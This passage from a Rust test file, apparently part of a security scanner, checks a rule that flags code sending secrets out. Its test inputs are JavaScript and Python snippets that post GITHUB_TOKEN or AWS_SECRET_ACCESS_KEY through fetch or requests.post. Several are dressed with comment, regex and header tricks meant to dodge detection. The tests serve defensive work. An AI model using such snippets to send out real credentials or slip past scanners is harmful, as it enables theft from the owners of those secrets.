960    // Nested "headers" key inside body/data/json must NOT suppress
961    // -----------------------------------------------------------------------
962
963    #[test]
964    fn test_exfil_nested_headers_in_body_fires() {
965        let input = r#"fetch(url, {body: JSON.stringify({headers: "x", token: process.env.GITHUB_TOKEN})})"#;
966        let findings = check(input, Some("test.js"));
967        assert!(
968            findings
969                .iter()
970                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
971            "nested 'headers' key inside body payload should NOT suppress"
972        );
973    }
974
975    #[test]
976    fn test_exfil_python_nested_headers_in_data_fires() {
977        let input = r#"requests.post(url, data={"headers": "x", "token": os.environ["AWS_SECRET_ACCESS_KEY"]})"#;
978        let findings = check(input, Some("test.py"));
979        assert!(
980            findings
981                .iter()
982                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
983            "nested 'headers' key inside data= dict should NOT suppress"
984        );
985    }
986
987    #[test]
988    fn test_exfil_nested_headers_in_json_fires() {
989        let input = r#"fetch(url, {json: {headers: "x", token: process.env.GITHUB_TOKEN}})"#;
990        let findings = check(input, Some("test.js"));
991        assert!(
992            findings
993                .iter()
994                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
995            "nested 'headers' key inside json property should NOT suppress"
996        );
997    }
998
999    // -----------------------------------------------------------------------
1000    // Commented-out "headers" keyword must not suppress real data exfil
1001    // -----------------------------------------------------------------------
1002
1003    #[test]
1004    fn test_exfil_python_hash_comment_headers_fires() {
1005        let input = "requests.post(url, data={# headers: fake\n'token': os.environ[\"AWS_SECRET_ACCESS_KEY\"]})";
1006        let findings = check(input, Some("test.py"));
1007        assert!(
1008            findings
1009                .iter()
1010                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1011            "# headers: inside comment must NOT suppress data= exfil"
1012        );
1013    }
1014
1015    #[test]
1016    fn test_exfil_js_block_comment_headers_fires() {
1017        let input =
1018            r#"fetch(url, {/* headers: */ body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
1019        let findings = check(input, Some("test.js"));
1020        assert!(
1021            findings
1022                .iter()
1023                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1024            "/* headers: */ inside comment must NOT suppress body exfil"
1025        );
1026    }
1027
1028    #[test]
1029    fn test_exfil_regex_literal_headers_fires() {
1030        let input = r#"fetch(url, {body: /headers: \{/, json: process.env.GITHUB_TOKEN})"#;
1031        let findings = check(input, Some("test.js"));
1032        assert!(
1033            findings
1034                .iter()
1035                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1036            "/headers: .../ inside regex literal must NOT suppress"
1037        );
1038    }
1039
1040    #[test]
1041    fn test_exfil_regex_literal_authorization_fires() {
1042        let input = r#"fetch(url, {body: /Authorization: \[/, json: process.env.GITHUB_TOKEN})"#;
1043        let findings = check(input, Some("test.js"));
1044        assert!(
1045            findings
1046                .iter()
1047                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1048            "/Authorization: .../ inside regex literal must NOT suppress"
1049        );
1050    }
1051
1052    // -----------------------------------------------------------------------
1053    // Division across newlines must not truncate call span
1054    // -----------------------------------------------------------------------
1055
1056    #[test]
1057    fn test_exfil_multiline_division_fires() {
1058        let input = "fetch(url, {body: 1\n/ 2, json: process.env.GITHUB_TOKEN})";
1059        let findings = check(input, Some("test.js"));
1060        assert!(
1061            findings
1062                .iter()
1063                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1064            "multiline division should not break parser"
1065        );
1066    }
1067
1068    #[test]
1069    fn test_exfil_multiline_paren_division_fires() {
1070        let input = "fetch(url, {body: (a\n/ b), json: process.env.GITHUB_TOKEN})";
1071        let findings = check(input, Some("test.js"));
1072        assert!(
1073            findings
1074                .iter()
1075                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1076            "parenthesized multiline division should not break parser"
1077        );
1078    }
1079
1080    #[test]
1081    fn test_find_call_end_multiline_division() {
1082        let input = b"url, {body: 1\n/ 2, val})";
1083        assert_eq!(find_call_end(input, 0), Some(24));
1084    }
1085
1086    // -----------------------------------------------------------------------
1087    // Postfix ++/-- before division must not truncate call span
1088    // -----------------------------------------------------------------------
1089
1090    #[test]
1091    fn test_exfil_postfix_increment_division_fires() {
1092        let input = r#"fetch(url, {body: a++ / 2, json: process.env.GITHUB_TOKEN})"#;
1093        let findings = check(input, Some("test.js"));
1094        assert!(
1095            findings
1096                .iter()
1097                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1098            "a++ / 2 should not break parser"
1099        );
1100    }
1101
1102    #[test]
1103    fn test_exfil_postfix_decrement_division_fires() {
1104        let input = r#"fetch(url, {body: a-- / 2, json: process.env.GITHUB_TOKEN})"#;
1105        let findings = check(input, Some("test.js"));
1106        assert!(
1107            findings
1108                .iter()
1109                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1110            "a-- / 2 should not break parser"
1111        );
1112    }
1113
1114    #[test]
1115    fn test_find_call_end_postfix_increment() {
1116        let input = b"url, {body: a++ / 2, val})";
1117        assert_eq!(find_call_end(input, 0), Some(26));
1118    }
1119
1120    #[test]
1121    fn test_find_call_end_postfix_decrement() {
1122        let input = b"url, {body: a-- / 2, val})";
1123        assert_eq!(find_call_end(input, 0), Some(26));
1124    }
1125
1126    // -----------------------------------------------------------------------
1127    // Combined: postfix division + non-send property must suppress
1128    // -----------------------------------------------------------------------
1129
1130    #[test]
1131    fn test_exfil_postfix_inc_div_then_meta_no_fire() {
1132        let input = r#"fetch(url, {body: a++ / 2, meta: process.env.GITHUB_TOKEN})"#;
1133        let findings = check(input, Some("test.js"));
1134        assert!(
1135            !findings
1136                .iter()
1137                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1138            "secret in meta: after body: a++ / 2 should NOT fire"
1139        );
1140    }
1141
1142    #[test]
1143    fn test_exfil_postfix_dec_div_then_token_no_fire() {
1144        let input = r#"fetch(url, {body: a-- / 2, token: process.env.GITHUB_TOKEN})"#;
1145        let findings = check(input, Some("test.js"));
1146        assert!(
1147            !findings
1148                .iter()
1149                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1150            "secret in token: after body: a-- / 2 should NOT fire"
1151        );
1152    }
1153}